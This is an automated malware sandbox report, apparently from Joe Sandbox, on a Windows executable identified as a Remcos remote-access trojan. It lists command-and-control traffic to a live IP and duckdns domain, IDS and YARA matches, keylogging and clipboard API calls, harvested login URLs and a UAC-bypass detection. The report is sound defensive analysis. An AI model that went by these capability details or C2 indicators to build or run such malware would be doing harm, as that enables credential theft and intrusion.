Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe | Code function: 4x nop then jmp 044F79E8h 0_2_044F7C29
Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe | Code function: 4x nop then jmp 05316C80h 10_2_05316EC1

                    Networking

                    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49712 -> 103.186.117.77:2404
                    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 103.186.117.77:2404 -> 192.168.2.5:49712
                    Source: Malware configuration extractorURLs: bubemoney7221.duckdns.org
                    Source: unknownDNS query: name: bubemoney7221.duckdns.org
                    Source: global trafficTCP traffic: 192.168.2.5:49712 -> 103.186.117.77:2404
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox ViewIP Address: 103.186.117.77 103.186.117.77
                    Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49714 -> 178.237.33.50:80
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,15_2_0041B411
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login, equals www.yahoo.com (Yahoo)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuddy)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuddy)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: bubemoney7221.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmp, mXJeXQoaGktJCW.exeString found in binary or memory: http://geoplugin.net/json.gp
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001196000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001187000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpj
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: bhv4754.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000000.00000002.2081220556.000000000252A000.00000004.00000800.00020000.00000000.sdmp, mXJeXQoaGktJCW.exe, 0000000A.00000002.2120600305.0000000003349000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142038542.0000000001384000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142903855.00000000018BD000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000011.00000002.2142368681.000000000150B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, mXJeXQoaGktJCW.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000014.00000002.2135059632.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeString found in binary or memory: https://www.google.com/accounts/servicelogin

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000015_2_0040A2F3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,15_2_0040B749
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168FC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_0040987A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_00406DFC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_00406E9F
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,20_2_004068B5
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,20_2_004072B5
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,15_2_0040A41B
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\dfgh\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041CA73 SystemParametersInfoW,15_2_0041CA73

                    System Summary

                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05068A18 NtQueryInformationProcess,0_2_05068A18
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05068F50 NtQueryInformationProcess,0_2_05068F50
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D8A18 NtQueryInformationProcess,10_2_077D8A18
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 10_2_077D8F50 NtQueryInformationProcess,10_2_077D8F50
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004016FD NtdllDefWindowProc_A,19_2_004016FD
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 19_2_004017B7 NtdllDefWindowProc_A,19_2_004017B7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00402CAC NtdllDefWindowProc_A,20_2_00402CAC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 20_2_00402D66 NtdllDefWindowProc_A,20_2_00402D66
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,15_2_004167EF
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0232DE0C0_2_0232DE0C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F16900_2_044F1690
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F12580_2_044F1258
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F1F000_2_044F1F00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F3A480_2_044F3A48
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_044F1AC80_2_044F1AC8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05065D700_2_05065D70
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_050684280_2_05068428
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_050690D80_2_050690D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05065D610_2_05065D61
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506AC000_2_0506AC00
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506AC100_2_0506AC10
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05067F680_2_05067F68
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506A9720_2_0506A972
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_0506A9800_2_0506A980
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05067B300_2_05067B30
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 0_2_05064A910_2_05064A91
